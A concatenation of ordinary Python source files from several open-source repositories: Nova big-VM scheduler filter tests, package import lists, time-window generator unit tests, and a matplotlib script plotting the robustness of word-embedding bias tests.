            encoded_s[rdx][0, :, 0, channel_dx] -= np.mean(encoded_s[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_s[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_s[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] -= np.max(encoded_t[rdx][0, :, 0, channel_dx])
            encoded_t[rdx][0, :, 0, channel_dx] *= -1.0
            encoded_t[rdx][0, :, 0, channel_dx] -= np.mean(encoded_t[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_t[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_t[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] /= float(template_w)
        siamese_input_list.append(encoded_t[rdx])
        siamese_input_list.append(encoded_s[rdx])
    return siamese_input_list

# ---- nova/tests/unit/scheduler/filters/test_bigvm_filters.py (mariusleu/nova, Apache-2.0) ----
# Copyright (c) 2019 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import mock
import nova.conf
from nova import objects
from nova.scheduler.filters import bigvm_filter
from nova import test
from nova.tests.unit.scheduler import fakes
from nova.tests import uuidsentinel
CONF = nova.conf.CONF
@mock.patch('nova.scheduler.client.report.'
            'SchedulerReportClient._get_inventory')
class TestBigVmBaseFilter(test.NoDBTestCase):

    def setUp(self):
        super(TestBigVmBaseFilter, self).setUp()
        self.filt_cls = bigvm_filter.BigVmBaseFilter()
        self.hv_size = CONF.bigvm_mb + 1024

    def test_big_vm_host_without_inventory(self, mock_inv):
        mock_inv.return_value = {}
        host = fakes.FakeHostState('host1', 'compute',
                                   {'free_ram_mb': self.hv_size,
                                    'total_usable_ram_mb': self.hv_size,
                                    'uuid': uuidsentinel.host1})
        self.assertIsNone(self.filt_cls._get_hv_size(host))

    def test_big_vm_host_with_placement_error(self, mock_inv):
        mock_inv.return_value = None
        host = fakes.FakeHostState('host1', 'compute',
                                   {'free_ram_mb': self.hv_size,
                                    'total_usable_ram_mb': self.hv_size,
                                    'uuid': uuidsentinel.host1})
        self.assertIsNone(self.filt_cls._get_hv_size(host))

    def test_big_vm_host_with_empty_inventory(self, mock_inv):
        mock_inv.return_value = {'inventories': {}}
        host = fakes.FakeHostState('host1', 'compute',
                                   {'free_ram_mb': self.hv_size,
                                    'total_usable_ram_mb': self.hv_size,
                                    'uuid': uuidsentinel.host1})
        self.assertIsNone(self.filt_cls._get_hv_size(host))

    def test_big_vm_get_hv_size_with_cache(self, mock_inv):
        mock_inv.return_value = {}
        host = fakes.FakeHostState('host1', 'compute',
                                   {'free_ram_mb': self.hv_size,
                                    'total_usable_ram_mb': self.hv_size,
                                    'uuid': uuidsentinel.host1})
        self.filt_cls._HV_SIZE_CACHE = {
            host.uuid: 1234,
            'last_modified': time.time()
        }
        self.assertEqual(self.filt_cls._get_hv_size(host), 1234)

    def test_big_vm_get_hv_size_cache_timeout(self, mock_inv):
        mock_inv.return_value = {'inventories': {'MEMORY_MB':
                                                 {'max_unit': 23}}}
        host = fakes.FakeHostState('host1', 'compute',
                                   {'free_ram_mb': self.hv_size,
                                    'total_usable_ram_mb': self.hv_size,
                                    'uuid': uuidsentinel.host1})
        mod = time.time() - self.filt_cls._HV_SIZE_CACHE_RETENTION_TIME
        self.filt_cls._HV_SIZE_CACHE = {
            host.uuid: 1234,
            'last_modified': mod
        }
        self.assertEqual(self.filt_cls._get_hv_size(host), 23)
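The `_HV_SIZE_CACHE` behaviour exercised above (a dict carrying a `'last_modified'` timestamp that is compared against a retention time) follows a common expiring-cache pattern. A minimal standalone sketch of that pattern; the names and the retention value are illustrative, not nova's actual code:

```python
import time

RETENTION_TIME = 10 * 60  # seconds; illustrative value

def get_cached(cache, key, fetch):
    # Drop the whole cache once it is older than the retention time,
    # then lazily re-populate missing entries and stamp the refresh time.
    if time.time() - cache.get('last_modified', 0) > RETENTION_TIME:
        cache.clear()
    if key not in cache:
        cache[key] = fetch(key)
        cache['last_modified'] = time.time()
    return cache[key]

cache = {}
value = get_cached(cache, 'host1', lambda k: 1234)
```

As in the tests, a stale `'last_modified'` forces a re-fetch (the timeout test above sets it `_HV_SIZE_CACHE_RETENTION_TIME` in the past), while a fresh one returns the cached value.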
class TestBigVmClusterUtilizationFilter(test.NoDBTestCase):
def setUp(self):
super(TestBigVmClusterUtilizationFilter, self).setUp()
self.hv_size = CONF.bigvm_mb + 1024
self.filt_cls = bigvm_filter.BigVmClusterUtilizationFilter()
self.filt_cls._HV_SIZE_CACHE = {
uuidsentinel.host1: self.hv_size,
'last_modified': time.time()
}
def test_big_vm_with_small_vm_passes(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=1024, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_baremetal_instance_passes(self):
extra_specs = {'capabilities:cpu_arch': 'x86_64'}
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs=extra_specs))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_hv_size(self):
"""If there's no inventory for this host, it should not even have
passed placement API checks, so we stop it here.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = None
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram(self):
# there's enough RAM available in the cluster but not enough (~50 % of
# the requested size on average)
# 12 hosts (bigvm + 1 GB size)
# 11 big VM + some smaller (12 * 1 GB) already deployed
# -> still bigvm_mb left, but ram utilization ratio of all hosts is too
# high
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': CONF.bigvm_mb,
'total_usable_ram_mb': total_ram})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram_ignores_ram_ratio(self):
# same as test_big_vm_without_enough_ram but with more theoretical RAM
# via `ram_allocation_ratio`. Big VMs reserve all memory, so the ratio
# does not count for them.
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': CONF.bigvm_mb,
'total_usable_ram_mb': total_ram,
'ram_allocation_ratio': 1.5})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram_percent(self):
# there's just barely not enough RAM available
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
hv_percent = self.filt_cls._get_max_ram_percent(CONF.bigvm_mb,
self.hv_size)
free_ram_mb = total_ram - (total_ram * hv_percent / 100.0) - 128
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': free_ram_mb,
'total_usable_ram_mb': total_ram})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_enough_ram(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
hv_percent = self.filt_cls._get_max_ram_percent(CONF.bigvm_mb,
self.hv_size)
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': total_ram - (total_ram * hv_percent / 100.0),
'total_usable_ram_mb': total_ram})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestBigVmFlavorHostSizeFilter(test.NoDBTestCase):
def setUp(self):
super(TestBigVmFlavorHostSizeFilter, self).setUp()
self.hv_size = CONF.bigvm_mb + 1024
self.filt_cls = bigvm_filter.BigVmFlavorHostSizeFilter()
self.filt_cls._HV_SIZE_CACHE = {
uuidsentinel.host1: self.hv_size,
'last_modified': time.time()
}
def test_big_vm_with_small_vm_passes(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=1024, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_baremetal_instance_passes(self):
extra_specs = {'capabilities:cpu_arch': 'x86_64'}
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs=extra_specs))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_hv_size(self):
"""If there's no inventory for this host, it should not even have
passed placement API checks, so we stop it here.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = None
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_memory_match_with_tolerance(self):
"""We only accept tolerance below not above the given value."""
def call(a, b):
return self.filt_cls._memory_match_with_tolerance(a, b)
self.filt_cls._HV_SIZE_TOLERANCE_PERCENT = 10
self.assertTrue(call(1024, 1024 - 1024 * 0.1))
self.assertFalse(call(1024, 1024 - 1024 * 0.1 - 1))
self.assertTrue(call(1024, 1024))
self.assertFalse(call(1024, 1025))
self.filt_cls._HV_SIZE_TOLERANCE_PERCENT = 50
self.assertTrue(call(1024, 512))
self.assertFalse(call(1024, 511))
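The assertions above fix the semantics: a memory value matches only when it is at most `_HV_SIZE_TOLERANCE_PERCENT` *below* the reference size, and never above it. As a standalone sketch (a hypothetical free function, not the filter's actual method):

```python
def memory_match_with_tolerance(reference_mb, memory_mb, tolerance_percent=10):
    # accept values up to tolerance_percent below reference_mb, never above it
    return reference_mb * (1 - tolerance_percent / 100.0) <= memory_mb <= reference_mb
```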
def test_big_vm_with_matching_full_size(self):
"""Test automatic full size matching."""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_matching_half_size(self):
"""Test automatic full size matching."""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_half_size_not_defined(self):
"""Test automatic full size matching."""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_matching_size(self):
"""Fails both half and full size test"""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 1.5 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_without_key(self):
"""If we don't have the extra spec set, we fail"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_invalid_value(self):
"""invalid value in extra specs makes it unscheduleable"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'any'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_full_positive(self):
"""test specified full size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_full_negative(self):
"""test specified full size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_positive(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full,half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_positive_with_unknown(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'broken,half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_negative(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
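Taken together, the extra-specs tests above imply a matching rule: split `host_fraction` on commas, ignore unknown entries, fail if nothing valid remains (or if the key is missing), and otherwise pass when any configured fraction of the hypervisor size matches the flavor memory within the tolerance. A compact sketch of that rule — a hypothetical reconstruction with made-up numbers, not the filter's code:

```python
def host_passes(hv_size, memory_mb, host_fraction=None, fractions=None,
                tolerance_percent=10):
    # hypothetical reconstruction of the matching rule implied by the tests
    fractions = fractions or {'full': 1, 'half': 0.5}
    if hv_size is None:
        return False  # no inventory for the host -> fail outright
    if host_fraction is None:
        wanted = list(fractions.values())
    else:
        # unknown names are ignored, so 'broken,half' still matches on 'half';
        # if nothing valid remains, the request is unschedulable
        wanted = [fractions[f] for f in host_fraction.split(',')
                  if f in fractions]
        if not wanted:
            return False
    return any(hv_size * f * (1 - tolerance_percent / 100.0)
               <= memory_mb <= hv_size * f for f in wanted)
```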
fae68e94d8b6773b1e07da4536599c45f6bcd5c4 | 230 | py | Python | throttle/tests/__init__.py | sobotklp/django-throttle-requests | b54fced5bbff2b95495bb3b8e9ccc064ed9afd98 | ["MIT"]
from throttle.tests.test_utils import test_load_module_from_path
from throttle.tests.test_zones import TestRemoteIP, Test_ThrottleZone
from throttle.tests.test_decorators import test_throttle
from throttle.tests.backends import *
4f0d9d2aff3065dd502eceb20f081d206d262d8e | 116 | py | Python | ms2ldaviz/basicviz/views/__init__.py | RP0001/ms2ldaviz | 35ae516f5d3ec9d1a348e8308a4ea50f3ebcdfd7 | ["MIT"]
from views_index import *
from views_lda_single import *
from views_lda_multi import *
from views_lda_admin import *
87e9db316353c863e5bbd60165f723e5fcd2d814 | 3,409 | py | Python | test/test_time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | ["MIT"]
#!/usr/bin/env python
import unittest
from datetime import datetime, time

import pytz

from time_window_generator import TimeWindowGenerator

__author__ = "Aditya Pahuja"
__copyright__ = "Copyright (c) 2020"
__maintainer__ = "Aditya Pahuja"
__email__ = "aditya.s.pahuja@gmail.com"
__status__ = "Production"


class TestTimeWindowGenerator(unittest.TestCase):
    LONDON_TIMEZONE = pytz.timezone('Europe/London')

    def setUp(self):
        start_time = time(8, 0, 0, 0, TestTimeWindowGenerator.LONDON_TIMEZONE)
        stop_time = time(16, 30, 0, 0, TestTimeWindowGenerator.LONDON_TIMEZONE)
        self.time_checker = TimeWindowGenerator({'MONDAY', 'TUESDAY'}, start_time, stop_time, TestTimeWindowGenerator.LONDON_TIMEZONE)

    def test_get_today_window_when_current_date_is_before_start_time(self):
        date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 7, 59, 59, 999999), is_dst=True)
        window = self.time_checker.get_window_of_time(date)
        self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 8, 0, 0, 0), is_dst=True))
        self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True))

    def test_get_today_window_when_current_date_is_before_end_time(self):
        date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True)
        window = self.time_checker.get_window_of_time(date)
        self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 8, 0, 0, 0), is_dst=True))
        self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True))

    def test_get_tomorrow_window_when_current_date_is_after_end_time(self):
        date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 31, 0, 0), is_dst=True)
        window = self.time_checker.get_window_of_time(date)
        self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 8, 0, 0, 0), is_dst=True))
        self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 16, 30, 0, 0), is_dst=True))

    def test_get_next_window_when_current_date_is_after_end_time_and_is_on_tuesday(self):
        date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 16, 31, 0, 0), is_dst=True)
        window = self.time_checker.get_window_of_time(date)
        self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 8, 0, 0, 0), is_dst=True))
        self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 16, 30, 0, 0), is_dst=True))

    def test_get_next_window_when_current_date_is_not_on_days(self):
        date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 8, 17, 31, 0, 0), is_dst=True)
        window = self.time_checker.get_window_of_time(date)
        self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 8, 0, 0, 0), is_dst=True))
        self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 16, 30, 0, 0), is_dst=True))
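The five scenarios above fully determine the rollover behaviour: stay on today while the stop time has not yet passed, otherwise advance day by day until the next allowed weekday. A timezone-free sketch of `get_window_of_time` consistent with these tests (an illustration only — the real class also handles pytz localization):

```python
from collections import namedtuple
from datetime import datetime, time, timedelta

Window = namedtuple('Window', ['start_date', 'stop_date'])
WEEKDAYS = ['MONDAY', 'TUESDAY', 'WEDNESDAY', 'THURSDAY',
            'FRIDAY', 'SATURDAY', 'SUNDAY']

class NaiveTimeWindowGenerator:
    def __init__(self, days, start_time, stop_time):
        self.days = days
        self.start_time = start_time
        self.stop_time = stop_time

    def get_window_of_time(self, now):
        day = now.date()
        # advance until we hit an allowed weekday whose stop time is still ahead
        while (WEEKDAYS[day.weekday()] not in self.days
               or (day == now.date() and now.time() > self.stop_time)):
            day += timedelta(days=1)
        return Window(datetime.combine(day, self.start_time),
                      datetime.combine(day, self.stop_time))
```

With `{'MONDAY', 'TUESDAY'}` and an 08:00–16:30 window, a Tuesday 16:31 query rolls all the way to the following Monday, matching `test_get_next_window_when_current_date_is_after_end_time_and_is_on_tuesday`.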
e20c550b4dc39edb4fcbf0c351376a1eb9dd2e83 | 6,500 | py | Python | paper/plotRobustnessTests.py | SebastianGer/biases-in-word-embeddings | 001499003caf213acf62dffbe29a54259a60e3e4 | ["MIT"]
# Plots the results of the experiments investigating the robustness of the WEAT to permutation and subsampling
import pandas as pd
import matplotlib
matplotlib.use('pgf')
import matplotlib.pyplot as plt
df = pd.read_csv("data/robustnessToPermutation.csv")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of bias tests under permutation")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToPermutationP.pgf")
fig.savefig("plots/robustnessToPermutationP.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToPermutation.csv")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2))
plt.ylabel("Effect size")
plt.legend()  # loc="lower right"
plt.title("Robustness of bias tests under permutation")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToPermutationD.pgf")
fig.savefig("plots/robustnessToPermutationD.pdf")
plt.clf()
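Each block first reshapes the long-format CSV with `DataFrame.pivot`, turning every distinct `Test` into its own column so that `boxplot()` draws one box per bias test. On a toy frame (the test names here are made up) the reshape looks like this:

```python
import pandas as pd

df = pd.DataFrame({
    'Iteration': [1, 1, 2, 2],
    'Test': ['WEAT1', 'WEAT2', 'WEAT1', 'WEAT2'],  # hypothetical test names
    'p': [0.01, 0.40, 0.02, 0.35],
})
wide = df.pivot(index='Iteration', columns='Test', values='p')
print(list(wide.columns))  # one column per test -> one boxplot per test
```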
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.01]
# Replace NA string with NaN value
df = df.replace("'NA'", float('NaN'))
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.01")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.01P.pgf")
fig.savefig("plots/robustnessToSubsampling0.01P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.01")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.01D.pgf")
fig.savefig("plots/robustnessToSubsampling0.01D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.05]
# Replace NA string with NaN value
df = df.replace("'NA'", float('NaN'))
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.05")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.05P.pgf")
fig.savefig("plots/robustnessToSubsampling0.05P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.05")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.05D.pgf")
fig.savefig("plots/robustnessToSubsampling0.05D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.1]
# Replace NA string with NaN value
df = df.replace("'NA'", float('NaN'))
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.1")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.1P.pgf")
fig.savefig("plots/robustnessToSubsampling0.1P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.1")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.1D.pgf")
fig.savefig("plots/robustnessToSubsampling0.1D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.5]
# Replace NA string with NaN value
df = df.replace("'NA'", float('NaN'))
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.5")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.5P.pgf")
fig.savefig("plots/robustnessToSubsampling0.5P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.5")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.5D.pgf")
fig.savefig("plots/robustnessToSubsampling0.5D.pdf")
